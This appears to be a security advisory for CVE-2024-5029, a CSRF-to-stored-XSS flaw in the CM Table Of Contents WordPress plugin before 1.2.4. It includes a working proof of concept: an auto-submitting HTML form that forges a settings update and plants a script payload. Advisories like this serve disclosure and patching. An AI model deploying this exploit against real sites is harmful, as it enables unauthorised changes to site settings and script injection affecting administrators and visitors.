CM Table Of Contents – WordPress TOC Plugin < 1.2.4 – Stored XSS via CSRF | CVE 2024-5029

Description

The plugin does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

v1.2.3 partially fixed the issue by adding a CSRF check, but was still lacking escaping of the settings.

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cmtoc_settings" method="POST">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsOnlySingle" value="0" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsOnlySingle" value="1" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentOnMainQuery" value="0" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsHeaderDescription" value='"><script>alert(1)</script>' />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel0Tag" value="h1" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel0Class" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel0Id" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel1Tag" value="h2" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel1Class" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel1Id" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel2Tag" value="h3" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel2Class" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel2Id" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel3Tag" value="h4" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel3Class" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel3Id" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel4Tag" value="h5" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel4Class" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel4Id" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel5Tag" value="h6" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel5Class" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel5Id" value="" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel0Size" value="25px" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel1Size" value="22px" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel2Size" value="19px" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel3Size" value="16px" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel4Size" value="13px" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsLevel5Size" value="10px" />
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentSave" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```